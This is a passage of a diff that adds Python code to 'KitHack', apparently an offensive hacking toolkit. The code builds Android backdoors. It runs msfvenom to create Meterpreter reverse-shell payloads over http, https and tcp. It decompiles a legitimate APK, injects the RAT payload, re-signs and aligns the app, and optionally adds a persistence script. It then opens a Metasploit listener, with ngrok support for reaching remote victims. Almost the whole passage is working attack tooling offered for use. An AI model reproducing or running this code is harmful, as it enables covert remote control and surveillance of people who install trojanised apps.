-bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif a == '02': + print( + '{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) + print('{0}[01]{1} Use the old Metasploit method'.format( + WHITE, YELLOW)) + print('{0}[02]{1} Use the new KitHack method'.format( + WHITE, YELLOW)) + + m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + m = m.zfill(2) + + if m == '01': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_https LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif m == '02': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) + location = os.getcwd() + print( + "{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) + print( + "\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool d -f -o output/payload output/payload.apk') + print( + "\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) + print( + "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool b output/original -o output/kithack.apk') + if os.path.isfile('output/kithack.apk'): + print( + "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + time.sleep(4) + os.system( + 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + os.system( + 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + elif pay == '02': + print('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) + print('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) + print('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) + + a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + a = a.zfill(2) + + if a == '01': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + break + else: + Tk().withdraw() + icon = filedialog.askopenfilename( + title="KITHACK - SELECT ICON PNG", filetypes=(("png files", "*.png"), ("all files", "*.*"))) + print("\n{0}ICON: {1}".format(YELLOW, icon)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + file = open("/tmp/data.txt", "w") + file.write(icon + '\n') + file.write(mainout) + file.close() + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) + print( + "{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool d -f -o output/payload output/payload.apk') + print( + "\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) + print( + "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool b output/payload -o output/kithack.apk') + location = os.getcwd() + if os.path.isfile('output/kithack.apk'): + print( + "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + time.sleep(4) + os.system( + 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'rm -rf output/payload output/payload.apk output/kithack.apk') + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + os.system( + 'rm -rf output/payload output/payload.apk output/kithack.apk') + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + # Salida de bucle + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif a == '02': + print( + '{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) + print('{0}[01]{1} Use the old Metasploit method'.format( + WHITE, YELLOW)) + print('{0}[02]{1} Use the new KitHack method'.format( + WHITE, YELLOW)) + + m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + m = m.zfill(2) + + if m == '01': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_https LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif m == '02': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) + location = os.getcwd() + print( + "{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) + print( + "\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool d -f -o output/payload output/payload.apk') + print( + "\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) + print( + "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool b output/original -o output/kithack.apk') + if os.path.isfile('output/kithack.apk'): + print( + "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + time.sleep(4) + os.system( + 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + os.system( + 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + else: + print("{}\n[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + elif pay == '03': + print('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) + print('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) + print('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) + + a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + a = a.zfill(2) + + if a == '01': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + break + else: + Tk().withdraw() + icon = filedialog.askopenfilename( + title="KITHACK - SELECT ICON PNG", filetypes=(("png files", "*.png"), ("all files", "*.*"))) + print("\n{0}ICON: {1}".format(YELLOW, icon)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + file = open("/tmp/data.txt", "w") + file.write(icon + '\n') + file.write(mainout) + file.close() + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) + print( + "{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool d -f -o output/payload output/payload.apk') + print( + "\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) + print( + "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool b output/payload -o output/kithack.apk') + location = os.getcwd() + if os.path.isfile('output/kithack.apk'): + print( + "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + time.sleep(4) + os.system( + 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'rm -rf output/payload output/payload.apk output/kithack.apk') + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + os.system( + 'rm -rf output/payload output/payload.apk output/kithack.apk') + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + # Salida de bucle + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif a == '02': + print( + '{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) + print('{0}[01]{1} Use the old Metasploit method'.format( + WHITE, YELLOW)) + print('{0}[02]{1} Use the new KitHack method'.format( + WHITE, YELLOW)) + + m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + m = m.zfill(2) + + if m == '01': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( 